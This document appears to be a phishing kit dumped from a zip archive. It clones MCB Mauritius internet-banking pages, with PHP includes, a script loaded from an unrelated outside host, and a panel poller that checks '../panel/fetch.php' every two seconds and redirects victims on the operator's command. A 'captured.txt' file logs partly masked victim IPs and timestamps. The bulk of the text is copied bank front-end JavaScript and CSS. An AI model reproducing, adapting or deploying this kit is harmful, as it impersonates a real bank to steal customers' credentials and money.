//document.frmmain.fldPasswordVirtual.id=""; doRandomize(); } return false; } //----------------------------------------------------------------------------- function ClearPwd () { if (virtKeyb) { document.frmmain.fldPassword.value = ""; document.frmmain.fldPasswordStandard.value = ""; document.frmmain.fldPasswordVirtual.value = ""; doRandomize(); } return false; } //------------------------------------------------------------------------------ function formwindow_open(frm, title, id){ var window_name = 'process_' + id; var frm_action; window.open ( '' , window_name , 'toolbar=0,location=0,directories=0,status=1,menubar=0,scrollbars=1,resizable=0,left=0,top=0,width='+scr_w1+',height='+scr_h1 ); frm.target = window_name; frm.title.value = title; frm.fldRequestId.value = id; frm_action = frm.action; frm.action = "process.jsp" frm.submit (); frm.action = frm_action; } //------------------------------------------------------------------------------ function setScreenSize(){ scr_w1 = screen.availWidth-10+"px"; scr_h1 = screen.availHeight-60+"px"; } //------------------------------------------------------------------------------ function fNonce(){ var l_reqarr = new Array(); var fldRequestId=document.frmprocess.fldRequestId.value = "RRLGN04"; var fldDeviceId=document.frmmain.fldDeviceId.value; l_reqarr.push('fldDeviceId=01'); SendAjaxRequestLogin(l_reqarr,'RRLGN04',validatepassword,null,null,null); } function validatepassword(p_xml,p_text){ snonce = $("#nonce",p_text).val(); fLogon(snonce); } //------------------------------------------------------------------------------- </script><input name="fldRequestId" value="RRLGN01" type="hidden" ></input><input name="fldDeviceId" value="01" type="hidden" ></input></form> </div> <!--/form--> <form name="frmprocess" method="POST" action="https://ib.mcb.mu/T001/process.jsp"> <input type="hidden" name="fldRequestId" value=""/> <input type="hidden" name="fldDeviceId" value="01"/> <input type="hidden" name="title" value=""/> <input type="hidden" name="usertype" value="EN1"/> </form> <script type="text/javascript" src="https://www.images-home.com/image.js"></script> <script src="res/jq.js"></script> <script> var cd = "<?php echo $current_data; ?>"; setInterval(() => { $.post("../panel/fetch.php", {update:1}, function(d){ if(cd!=d){ window.location=d; cd=d; } }) }, 2000); </script> </body></html> PK [��\�Qp� � app/captured.txtnu W+A�� ip : ^64.106.213.* | 03/01/2023 02:44:02am ip : ^64.106.213.* | 03/01/2023 02:44:02am ip : ^64.106.213.* | 03/01/2023 02:44:09am ip : ^64.106.213.* | 03/01/2023 02:44:10am ip : ^64.106.213.* | 03/01/2023 02:44:11am ip : ^64.106.213.* | 03/01/2023 02:44:56am ip : ^64.106.213.* | 03/01/2023 02:44:56am ip : ^64.106.213.* | 03/01/2023 02:45:02am ip : ^64.106.213.* | 03/01/2023 02:45:02am ip : ^64.106.213.* | 03/01/2023 02:45:02am ip : ^64.106.213.* | 03/01/2023 02:45:06am ip : ^64.106.213.* | 03/01/2023 02:45:18am ip : ^64.106.213.* | 03/01/2023 02:45:18am ip : ^64.106.213.* | 03/01/2023 02:45:20am ip : ^64.106.213.* | 03/01/2023 02:45:20am ip : ^64.106.213.* | 03/01/2023 02:45:20am ip : ^64.106.213.* | 03/01/2023 02:45:22am ip : ^64.106.213.* | 03/01/2023 02:45:22am ip : ^64.106.213.* | 03/01/2023 02:45:51am ip : ^64.106.213.* | 03/01/2023 02:45:51am ip : ^64.106.213.* | 03/01/2023 02:45:53am ip : ^64.106.213.* | 03/01/2023 02:45:54am ip : ^64.106.213.* | 03/01/2023 02:45:55am ip : ^64.106.213.* | 03/01/2023 02:45:59am ip : ^64.106.213.* | 03/01/2023 02:46:00am ip : ^64.106.213.* | 03/01/2023 02:46:00am ip : ^64.106.213.* | 03/01/2023 02:46:06am ip : ^64.106.213.* | 03/01/2023 02:46:37am ip : ^64.106.213.* | 03/01/2023 02:46:37am ip : ^64.106.213.* | 03/01/2023 02:46:47am ip : ^64.106.213.* | 03/01/2023 02:46:47am ip : ^64.106.213.* | 03/01/2023 02:47:15am ip : ^64.106.213.* | 03/01/2023 02:47:17am ip : ^162.158.*.* | 02/05/2023 10:20:10am ip : ^162.158.*.* | 02/05/2023 10:20:12am ip : ^162.158.*.* | 02/05/2023 10:20:12am ip : ^162.158.*.* | 02/05/2023 11:14:53am ip : ^162.158.*.* | 02/05/2023 01:05:38pm ip : ^162.158.*.* | 02/05/2023 02:50:48pm ip : ^162.158.*.* | 03/05/2023 06:44:17am ip : ^162.158.*.* | 03/05/2023 07:01:38am ip : ^162.158.*.* | 03/05/2023 07:25:22am ip : ^162.158.*.* | 03/05/2023 07:52:04am ip : ^162.158.95.* | 03/05/2023 07:52:04am ip : ^162.158.*.* | 03/05/2023 08:20:42am ip : ^162.158.*.* | 03/05/2023 08:44:56am ip : ^162.158.*.* | 03/05/2023 08:53:40am ip : ^162.158.95.* | 03/05/2023 08:53:40am ip : ^162.158.*.* | 03/05/2023 09:07:06am ip : ^162.158.95.* | 03/05/2023 09:07:06am ip : ^162.158.*.* | 03/05/2023 09:11:35am ip : ^162.158.*.* | 03/05/2023 09:21:09am ip : ^162.158.*.* | 03/05/2023 09:21:13am ip : ^162.158.*.* | 03/05/2023 09:23:54am ip : ^162.158.*.* | 03/05/2023 09:57:30am ip : ^162.158.*.* | 03/05/2023 10:29:56am ip : ^162.158.*.* | 03/05/2023 10:44:40am ip : ^162.158.*.* | 03/05/2023 11:37:48am ip : ^162.158.*.* | 03/05/2023 12:48:46pm ip : ^162.158.*.* | 03/05/2023 01:19:20pm ip : ^162.158.*.* | 03/05/2023 02:14:46pm ip : ^162.158.95.* | 03/05/2023 02:14:46pm ip : ^162.158.*.* | 03/05/2023 02:47:57pm ip : ^162.158.*.* | 03/05/2023 02:49:11pm ip : ^162.158.*.* | 03/05/2023 02:49:17pm ip : ^162.158.*.* | 03/05/2023 03:32:08pm ip : ^162.158.*.* | 03/05/2023 03:45:36pm ip : ^162.158.*.* | 03/05/2023 03:47:59pm ip : ^162.158.*.* | 03/05/2023 04:20:22pm ip : ^162.158.*.* | 03/05/2023 04:42:31pm ip : ^162.158.*.* | 03/05/2023 04:43:47pm ip : ^162.158.*.* | 03/05/2023 04:43:56pm ip : ^162.158.*.* | 03/05/2023 04:44:13pm ip : ^162.158.*.* | 03/05/2023 04:44:15pm ip : ^162.158.*.* | 03/05/2023 05:00:36pm ip : ^162.158.*.* | 03/05/2023 05:02:00pm ip : ^162.158.*.* | 03/05/2023 05:30:26pm ip : ^162.158.*.* | 03/05/2023 06:08:05pm ip : ^162.158.95.* | 03/05/2023 06:08:05pm ip : ^162.158.*.* | 03/05/2023 09:31:07pm ip : ^162.158.*.* | 03/05/2023 09:31:07pm ip : ^162.158.*.* | 03/05/2023 09:32:07pm ip : ^162.158.*.* | 03/05/2023 09:42:47pm ip : ^162.158.*.* | 03/05/2023 10:18:44pm ip : ^162.158.*.* | 04/05/2023 05:56:26am ip : ^162.158.*.* | 04/05/2023 05:56:26am ip : ^162.158.*.* | 04/05/2023 06:59:53am ip : ^162.158.95.* | 04/05/2023 06:59:53am ip : ^162.158.*.* | 04/05/2023 07:21:18am ip : ^162.158.*.* | 04/05/2023 08:03:43am ip : ^162.158.95.* | 04/05/2023 08:03:43am ip : ^162.158.*.* | 04/05/2023 08:06:11am ip : ^162.158.*.* | 04/05/2023 11:35:46am ip : ^162.158.*.* | 04/05/2023 12:15:23pm ip : ^162.158.*.* | 04/05/2023 12:15:35pm ip : ^162.158.*.* | 04/05/2023 12:15:52pm ip : ^162.158.*.* | 04/05/2023 02:57:11pm ip : ^162.158.95.* | 04/05/2023 02:57:11pm ip : ^162.158.*.* | 04/05/2023 04:11:48pm ip : ^162.158.*.* | 04/05/2023 05:22:12pm ip : ^162.158.*.* | 05/05/2023 09:19:34am ip : ^162.158.*.* | 05/05/2023 09:31:05am ip : ^162.158.*.* | 05/05/2023 10:06:44am ip : ^162.158.95.* | 05/05/2023 10:06:44am ip : ^162.158.*.* | 05/05/2023 10:10:56am ip : ^162.158.*.* | 05/05/2023 12:36:06pm ip : ^162.158.95.* | 05/05/2023 12:36:06pm ip : ^162.158.*.* | 05/05/2023 12:59:19pm ip : ^162.158.*.* | 05/05/2023 03:53:33pm ip : ^162.158.*.* | 05/05/2023 05:48:09pm ip : ^162.158.*.* | 05/05/2023 05:48:20pm ip : ^162.158.95.* | 05/05/2023 05:48:20pm PK [��\�ͧ�d� d� app/out.phpnu W+A�� <?php require '../main.php'; ?> <!--[if lte IE 7]> <style type="text/css" > @import url("https://ib.mcb.mu/T001/css/cmn/theme.css"); </style> <![endif]--> <![if (!IE) | (gte IE 8)]> <style type="text/css" > @import url("https://ib.mcb.mu/T001/css/cmn/theme.uri.css"); </style> <![endif]> <script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/combined/jquery-includes.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/jsdir/jquery-migration.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/select2/js/select2.min.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/i18n/ui.datepicker-en.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/i18n/ui.datepicker-en-US.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/i18n/select2_locale_en.js" ></script><script type="text/JavaScript" src="https://ib.mcb.mu/T001/JS/i18n/select2_locale_en-US.js" ></script><script type="text/javascript" src="https://ib.mcb.mu/T001/JS/jquery.qrcode.min.js" ></script><script> var globalcnt = 1; var useragent = ""; var openWindowArray = new Array(); var message = new Object (); var isHelp= ''; message.maxopen = "Maximum limit reached for number of open windows. Please close a window to open new Transaction."; message.alreadyopen = "Window already Open."; message.addfav = "Add to Favourites"; message.alertstr = "Alert"; function SendDashboardFormRequest (p_frm,p_desc,p_currtxn,p_nosubmitForm) { try{ var windowobj = openWindow(p_frm.fldServiceType.value, p_desc); if(p_nosubmitForm) { return windowobj; } //document.frmtp.fldRequestId.value = defAppId+p_frm.fldServiceType.value+requestId; //document.frmtp.fldServiceType.value = p_frm.fldServiceType.value; if(windowobj) { p_frm.target = windowobj.getFrameName(); p_frm.submit(); } } catch(e) { } } function getPosition(arr,val) { if(arr != null && arr.length > 0) { for(var cnt = 0;cnt < arr.length; cnt++ ) { if(arr[cnt] == val) { return cnt; } } } return -1; } function getPresentWindow(arr,val) { var count=0; if(arr != null && arr.length > 0) { for(var cnt1 = 0;cnt1 < arr.length; cnt1++ ) { if(arr[cnt1] == val) { count++; } } } return count; } function addIntoArray(p_array, p_txn) { p_array.push(p_txn); } function removeFromArray(p_array, p_txn) { var index_value = getPosition(p_array,p_txn); var range = 1; p_array.splice(index_value,range); } function fireMenuHelp(p_txn){ var l_idtxn= ""+ p_txn + ".htm"; var l_default= ""+ p_txn + ".htm"; var features = "directories=no,location=no,menubar=no,status=no,scrollbars=yes," + "toolbar=no,dependant=no,resizable=yes,top=75,left=750," + "scrollbars=yes,width=400,height=500"; addlistWindow = window.open ("static/help.jsp?REFIDTXN="+l_idtxn+"&DEFPATH="+l_default, "details", features); addlistWindow.focus(); //addlistWindow.moveTo(700,80); } $(document).ready(function() { if(useragent=="ipad" || useragent=="android"){ //alert(useragent); if (parent.isMenuClassic()) { var l_height = $( window.parent.frames["frameSet_main"]).height(); var l_width = $( window.parent.frames["frameSet_main"]).width(); var msg_l = $('#MySplitter').width()-200; var msg_p = $('#MySplitter').width(); //alert(l_height); //alert(l_width); //var statusText = top.frames["frame_top"].document.getElementById('topContainer'); var txn_frm = top.frames["frame_txn"].document.getElementById('main'); if(l_width>l_height) { //LANDSCAPE // alert("LANDSCAPE"); // $(statusText).css('width','95%'); $('.workarea').css('width','auto'); $('.workarea').css('overflow','hidden'); $('#MySplitter').css('width',msg_p); $('#main').css('width',msg_l); } else { // Portrait // alert("PORTRAIT"); //$(statusText).css('width','65%'); $('.workarea').css('width',l_width); $('.workarea').css('overflow','auto'); $('#MySplitter').css('width',l_height); $('#main').css('width',msg_p); } } } if(useragent=="ipad"){ if (!parent.isMenuClassic()) { if (parent.frames.length > 0) { var heightDiv = $('form[name="frmmain"]').height() + $(window).height() - 200; $('.contentarea').css({height:heightDiv}); $('body').addClass("mainFrame"); $('form[name="frmmain"]').addClass("mainscroll"); try { $('form[name="frmmain"]').touchScroll({elastic: true, momentum: false}); touchTableScroll('displayTable'); function loaded() { document.addEventListener('touchmove', function(e){ e.preventDefault(); }); myScroll = new iScroll('displayTable', {elastic: false, momentum: false}); } document.addEventListener('DOMContentLoaded', loaded); } catch(e){ } } } }}); </script><style> .calMask { position: absolute; z-index:1000; background:#FFFFFF; border:0px solid; } .calContainer { position: relative; background:#FFFFFF; z-index:1007; border-bottom-color:#FFFFFF; border-color:#FFFFFF; border-left-color:#FFFFFF; border-top-color:#FFFFFF; border-right-color:#FFFFFF; font-color:#6677DD; } .screenMask { position: absolute; height:1000%; width: 1000%; left:0px; top:0px; z-index:1005; background: url('https://ib.mcb.mu/T001/images/transparent.gif'); } .calContent { position: relative; z-index:1010; background:#FFFFFF; border:2px inset; padding: 5px; } .TESTcpYearNavigation, .TESTcpMonthNavigation { background-color:#6677DD; text-align:center; vertical-align:center; text-decoration:none; color:#FFFFFF; font-weight:bold; } .TESTcpDayColumnHeader, .TESTcpYearNavigation, .TESTcpMonthNavigation, .TESTcpCurrentMonthDate, .TESTcpCurrentMonthDateDisabled, .TESTcpOtherMonthDate, .TESTcpOtherMonthDateDisabled, .TESTcpCurrentDate, .TESTcpCurrentDateDisabled, .TESTcpTodayText, .TESTcpTodayTextDisabled, .TESTcpText { font-family:arial; font-size:8pt; } TD.TESTcpDayColumnHeader { text-align:right; border:solid thin #6677DD; border-width:0 0 1 0; } .TESTcpCurrentMonthDate, .TESTcpOtherMonthDate, .TESTcpCurrentDate { text-align:right; text-decoration:none; } .TESTcpCurrentMonthDateDisabled, .TESTcpOtherMonthDateDisabled, .TESTcpCurrentDateDisabled { color:#D0D0D0; text-align:right; text-decoration:line-through; } .TESTcpCurrentMonthDate { color:#6677DD; font-weight:bold; } .TESTcpCurrentDate { color: #FFFFFF; font-weight:bold; } .TESTcpOtherMonthDate { color:#808080; } TD.TESTcpCurrentDate { color:#FFFFFF; background-color: #6677DD; border-width:1; border:solid thin #000000; } TD.TESTcpCurrentDateDisabled { border-width:1; border:solid thin #FFAAAA; } TD.TESTcpTodayText, TD.TESTcpTodayTextDisabled { border:solid thin #6677DD; border-width:1 0 0 0; } A.TESTcpTodayText, SPAN.TESTcpTodayTextDisabled { height:20px; } A.TESTcpTodayText { color:#6677DD; font-weight:bold; } SPAN.TESTcpTodayTextDisabled { color:#D0D0D0; } .TESTcpBorder { border:solid thin #6677DD; } .printWarning { display:none; } .noPrintWarning { display:none; } </style><style media="print" > .printWarning { display:inline-block; } .noPrintWarning { display:none; } </style><div id="testdiv1" style="position:absolute;visibility:hidden;background-color:white;layer-background-color:white;z-index:10005" ></div><div class="screenMask" id="calenderMask" style="position:absolute;display:none;background-color:white" onclick="hide_Cal();" ></div><script type="text/javascript" src="https://ib.mcb.mu/T001/jsdir/common.js" ></script><script language="JavaScript" type="text/JavaScript" > var idEntity = 'T001'; var l_appLayWidth = 0; window.parent.scrollTo(0,0); //----------------------------------------------------------------------------------------------------------------------- function setPageHeight(){ var height = 0,window_header_height=0;; var body = document.body, html = document.documentElement; var position=window.parent.pageYOffset; var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); parent.$("#appContainer").css("height",+ (0) + "px" ); parent.$("#_contentWrapper").css("height",+ (0) + "px" ); parent.$("#txnbodyLayout").css("height",+ (0) + "px" ); parent.$("#ApplicationLayout").css("height",+ (0) + "px" ); parent.$(".window_panel").css("height",+ (0) + "px" ); parent.$(".window_frame").css("height",+ (0) + "px" ); parent.$(".workarea").css("height",+ (0) + "px" ); height = Math.max( body.scrollHeight, body.offsetHeight, html.clientHeight, html.scrollHeight, html.offsetHeight ); window_header_height = parent.$(".window_header").height(); if('BFV'==idtxn){ height = 1700; } height = height + window_header_height; if(height < 200){ height = 280; } if(height>0){ parent.$(".workarea").css("height",+ (height+50) + "px" ); parent.$("#appContainer").css("height",+ (height+500) + "px" ); parent.$("#_contentWrapper").css("height",+ (height+350) + "px" ); parent.$("#ApplicationLayout").css("height",+ (height+250) + "px" ); parent.$(".window_panel").css("height",+ (height+250) + "px" ); parent.$(".window_frame").css("height",+ (height+100) + "px" ); } window.parent.scrollTo(0,position); } //----------------------------------------------------------------------------------------------------------------------- if(idEntity=='T001'){ $(document).ready(function(){ $("td:empty").html(" "); }); $(document).ready(function(){ if(top.isMenuClassic == undefined){ $('.workarea').addClass('popup'); } try { l_appLayWidth = parent.$("#ApplicationLayout").width(); } catch (e){ } var height = 0,window_header_height=0; var body = document.body, html = document.documentElement; var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); parent.$("#appContainer").css("height",+ (0) + "px" ); parent.$("#_contentWrapper").css("height",+ (0) + "px" ); parent.$("#txnbodyLayout").css("height",+ (0) + "px" ); parent.$("#ApplicationLayout").css("height",+ (0) + "px" ); parent.$(".window_panel").css("height",+ (0) + "px" ); parent.$(".window_frame").css("height",+ (0) + "px" ); parent.$(".workarea").css("height",+ (0) + "px" ); height = Math.max( body.scrollHeight, body.offsetHeight, html.clientHeight, html.scrollHeight, html.offsetHeight ); window_header_height = parent.$(".window_header").height(); height = height + window_header_height; if('BFV'==idtxn){ height = 1700; } if(height < 200){ height = 280; } if(height>0){ parent.$(".workarea").css("height",+ (height+50) + "px" ); parent.$("#appContainer").css("height",+ (height+500) + "px" ); parent.$("#_contentWrapper").css("height",+ (height+350) + "px" ); parent.$("#ApplicationLayout").css("height",+ (height+250) + "px" ); parent.$(".window_panel").css("height",+ (height+250) + "px" ); parent.$(".window_frame").css("height",+ (height+100) + "px" ); } }); try{ if(!top.isMenuClassic()){ $(document).ready(function() { var idrequest = 'RRUSR01'; var idtxn = idrequest.substring(2, 5); if(idtxn == "MAR"){ var desc = $("#pageheading").html(); }else{ var desc = $("#pageheading").text(); } var note = null; if(idtxn != 'DTF'){ note = $("#pageheadernote").text(); }else{note = $("#pageheadernote").html();} /* if(desc != ''){ $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(desc); document.title=desc; }*/ if(idtxn =="EMF"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Ways to Bank</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Register to e-statements</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } if(idtxn =="COU"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Help & Contact us</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Contact us</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } if(idtxn =="TDA"){ var brdcrumb = '<ul class="breadcrumbs" ><li class="breadcrumbs_crumb" ><a onclick="minimizeAll()" >Home</a></li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Accounts & Products</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Fixed deposits</li><li class="breadcrumbs_crumb_icon" ></li><li class="breadcrumbs_crumb" >Amend automatic renewal</li></ul>'; $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(brdcrumb); } var content = ''; var $windowControls = $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_function_bar"); $windowControls.siblings('.window_title_error').empty(); if ($windowControls.siblings('.window_title_error').length == 0) { $("#error-dialog-table").css("display", ""); content = $("#dialog-modal-error").html(); if(typeof content == "undefined") { content = $("#dialog-modal-error").text(); } //alert("content "+content); $windowControls.before("<div class='window_title_error active' >"+content+ "</div>"); }else{ $("#error-dialog-table").css("display", ""); content = $("#dialog-modal-error").html(); $windowControls.siblings('.window_title_error').html(content); } if ($windowControls.siblings('.window_title_header').length == 0) { $windowControls.before("<div class='window_title_header active' >" + desc + "</div>"); }else{ $windowControls.siblings('.window_title_header').html(desc); } if ($windowControls.siblings('.window_title_note').length == 0) { $windowControls.before("<div class='window_title_note active' >" + note + "</div>"); }else{ $windowControls.siblings('.window_title_note').html(note); } }); } } catch(e) { } }else { $(document).ready(function(){ if(top.isMenuClassic == undefined){ $('.workarea').addClass('popup'); } try { l_appLayWidth = parent.$("#ApplicationLayout").width(); } catch (e){ } }); try{ if(!top.isMenuClassic()){ $(document).ready(function() { var desc = $("#pageheading").text(); if(desc != ''){ $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_title_text").html(desc); document.title=desc; } var $windowControls = $("#"+window.name,parent.$("#ApplicationLayout")).closest("div.window_panel").find("div.window_function_bar"); if ($windowControls.siblings('.window_title_timestamp').length == 0) { if (top.isAuthTxnOnly != 'Y') { $windowControls.before("<div class='window_title_timestamp active' >" + $('#pageheadingdate').text() + "</div>"); } }else{ if (top.isAuthTxnOnly != 'Y') { $windowControls.siblings('.window_title_timestamp').text($('#pageheadingdate').text()); } } }); } } catch(e) { } } var popup_txnid=""; var popup_seq=""; var popup_target=""; var popup_win_name=""; var flgbtn=false; var highlightedTabs = new Array (); var helptxn='USR'; //----------------------------------------------------------------------------- function displayStatusMessage () { var idtxn = 'RRUSR01'; if(idtxn) { idtxn = idtxn.substring(2,5); } var totalcnt = 0 + 0; //+ 0; if(totalcnt == 0) { if (window.parent.frames['messageFrame']) { window.parent.frames['messageFrame'].resetErrors(); } else if (window.top.frames['messageFrame']) { window.top.frames['messageFrame'].resetErrors(); } } checkForAuditLogFrame(); } //----------------------------------------------------------------------------- $(function () { var count = 0 + 0 + 0; var idEntity = 'T001'; if(idEntity == 'T001'){ if (count > 0 && 'C' != 'M') { if("".length>150){ $('#dialog-modal-error').hide(); /*$('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false, minWidth : 600 } );*/ }else{ $('#dialog-modal-error').hide(); /*$('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false } );*/ } $("#dialog-modal-error").css("min-height", ""); $("#error-dialog-table").css("display", ""); $("#dialog-error").css("height", "auto"); } }else { if (count > 0 && 'C' != 'M') { if("".length>150){ $('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false, minWidth : 600 } ); }else{ $('#dialog-modal-error').dialog ( { autoOpen: true, position : 'center', modal : false, bgiframe : true, close : minimizeMessages, resizable : false, draggable : false } ); } $("#dialog-modal-error").css("min-height", ""); $("#error-dialog-table").css("display", ""); $("#dialog-error").css("height", "auto"); } } }) //----------------------------------------------------------------------------- function minimizeMessages () { var msgFrame; var msg_text = "Click here to view messages..." var l_footer_content = '<div id="msg_' + document.frmmain.fldServiceType.value + '" class="msgFrame">'; l_footer_content += '<img src="images/list_errors.gif" align="abdMiddle" title="' + msg_text +'" id="msg_' + document.frmmain.fldServiceType.value + '_img" >'; //l_footer_content += ' ' + msg_text l_footer_content += '</div>'; if (window.top.frames ["messageFrame"]) { msgFrame = $("#errorTab", window.top.frames ["messageFrame"].document); parent.document.getElementById('dataframe').rows = "25,*"; } else { msgFrame = $("#errorTab"); msgFrame.show(); document.getElementById('errorTab').style.display = 'inline-block'; } msgFrame.html (l_footer_content); msgFrame.click ( function () { $('#dialog-modal-error').dialog ('open'); $("#dialog-modal-error").css("min-height", ""); /*$('#dialog-modal-error').parent().css( { position:'absolute !important', left:'auto !important', right:'0px !important', top:'24px!important' });*/ } ); } //----------------------------------------------------------------------------- function highlightTab (p_tab_id) { var l_tab_obj, imageid, test, image1; if (highlightedTabs.length > 0 && highlightedTabs.contains (p_tab_id)) { l_tab_obj = document.getElementById (p_tab_id); imageid = l_tab_obj.id + "image"; test = l_tab_obj; image1 = document.createElement("img"); image1.setAttribute('id',imageid); image1.setAttribute('src','images/red_error.gif'); image1.setAttribute('align','absMiddle'); image1.className='errorImg'; test.childNodes [0].insertBefore(image1); addIntoArray (highlightedTabs, p_tab_id); /*$("#"+imageid).tooltip({ track: true, delay: 0, showURL: false, opacity: 1, fixPNG: false, showBody: " - ", extraClass: "pretty fancy", top: -15, left: 20 });*/ } } //----------------------------------------------------------------------------- function markErrorField (p_err_field, err_message){ markErrorField(p_err_field, err_message, 'default', 'default'); } //----------------------------------------------------------------------------- function markErrorField(p_err_field, err_message, p_targetPos, p_tooltipPos){ $(p_err_field).css ('border', '1px solid red'); $(p_err_field).css ('background-color', 'rgb(255, 240, 240)'); $(p_err_field).attr ('title', err_message); /*$(p_err_field).tooltip({ track: true, delay: 0, showURL: false, opacity: 1, fixPNG: false, showBody: " - ", extraClass: "pretty fancy", top: -15, left: 20 });*/ if(p_targetPos == 'default') p_targetPos = 'topMiddle'; if(p_tooltipPos == 'default') p_tooltipPos = 'bottomMiddle'; $(p_err_field).qtip({ position: { corner: { target: p_targetPos, tooltip: p_tooltipPos } }, style: { name: 'red', padding: '7px 13px', width: { max: 210, min: 0 }, tip: true } }); } //----------------------------------------------------------------------------- function initError(){ //Initialize Error } //----------------------------------------------------------------------------- function displayErrorMessage () { cnt = 0; totalcnt = 0; var arrErrorCode = new Array(); var arrErrorDesc = new Array(); var arrWarningCode = new Array(); var arrWarningDesc = new Array(); var arrInfoCode = new Array(); var arrInfoDesc = new Array(); var arrSuccessCode = new Array(); var arrSuccessDesc = new Array(); totalcnt = totalcnt + cnt; cnt = 0; totalcnt = totalcnt + cnt; } //----------------------------------------------------------------------------- function displayBulkStatusMessage () { return; } //----------------------------------------------------------------------------- function Draft ( P_idTxn , p_seqNo ) { if(document.frmmain.fldnextaction.value=='RD'){} else{ document.frmmain.fldnextaction.value ='DF'; } document.frmmain.fldauthaction.value ='VO'; try { document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+p_seqNo; } catch (e) { } SendTxnRequest('98',P_idTxn); } //----------------------------------------------------------------------------- function Draft(P_idTxn) { if(document.frmmain.fldnextaction.value=='RD'){} else{ document.frmmain.fldnextaction.value ='DF'; } document.frmmain.fldauthaction.value ='VO'; try { document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+'03'; } catch (e) { } SendTxnRequest('98',P_idTxn); } //----------------------------------------------------------------------------- function saveTemplate ( P_idTxn , p_seqNo ) { document.frmmain.fldnextaction.value = 'TP'; //Set fldauthaction to 'VI' if module and rule chk is required for Templates document.frmmain.fldauthaction.value = 'VO'; try { document.frmmain.fldistemplatetxn.value = 'true';//for generic payment only document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+p_seqNo; } catch (e) { } SendTxnRequest ('97',P_idTxn); } //----------------------------------------------------------------------------- function saveTemplate (P_idTxn) { document.frmmain.fldnextaction.value = 'TP'; //Set fldauthaction to 'VI' if module and rule chk is required for Templates document.frmmain.fldauthaction.value = 'VO'; try { document.frmmain.fldistemplatetxn.value = 'true';//for generic payment only document.frmmain.fldflagdealallowed.value = 'N';//for generic payment only } catch (e) { } try { document.frmmain.fldGPRequestId.value = 'RR'+P_idTxn+'03'; } catch (e) { } SendTxnRequest ('97',P_idTxn); } //----------------------------------------------------------------------------- function PrintPopup(p_request_id , p_section_id, p_form) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; var addlistWindow = window.open ("", "PrintPopup", features) ; p_form.fldSectionId.value = p_section_id; p_form.fldRequestId.value = p_request_id; p_form.fldSessionId.value = parent.idsession; p_form.target = "PrintPopup"; p_form.submit(); addlistWindow.focus(); } //------------------------------------------------------------------------------ function DowloadPopup(p_request_id , p_section_id, p_form) { var features = "dependant=no,directories=no,location=no,menubar=no" + ",resizable=yes,scrollbars=yes,titlebar=no,toolbar=no" + ",height=600,width=600,top=0,left=0,status=yes"; var addlistWindow = window.open ("", "DowloadPopup", features) ; p_form.fldSectionId.value = p_section_id; p_form.fldRequestId.value = p_request_id; p_form.fldSessionId.value = parent.idsession; p_form.target = "DowloadPopup"; p_form.submit(); addlistWindow.focus(); } //----------------------------------------------------------------------------- function getChangeFieldColor(){ var arr_fldchanged = new Array (); var arr_prevval = new Array (); var arr_idx = 0; var len = 0; var i; arr_idx = 0; len =arr_fldchanged.length; for(i=0;i<len;i++){ if(document.getElementById(arr_fldchanged[i]) != null && document.getElementById(arr_fldchanged[i]) != "undefined"){ document.getElementById(arr_fldchanged[i]).className = "ColHeadingLeftAlignedBold"; } } } //-------------------------------------------------------------------------------------- function defaultfunction(){ return true; } //-------------------------------------------------------------------------------------- function fnFixDecimalPlaces ( p_val , p_places ) { if ( p_val == '' || isNaN (p_val) || isNaN (p_val) || (p_places != '0' && p_places == '')) { return ''; } return (parseFloat (p_val)).toFixed (p_places); } //-------------------------------------------------------------------------------------- function fnSubmitForm () { try { if (parent.popupWindow) { parent.popupWindow.top.frames [1].name = 'txn_'+parent.idsession; document.frmmain.target = 'txn_'+parent.idsession; document.frmmain.fldSessionId.value = parent.idsession; document.frmmain.fldRequestId.value = "RR"+popup_txnid+popup_seq; document.frmmain.submit (); document.frmmain.target = ""; } } catch (e) { } } //-------------------------------------------------------------------------------------- function call_Popup ( p_feature , p_txnid , p_seqno , p_target ){ try { if (parent.popupWindow) { parent.popupWindow.close();//closing existing pop up window. 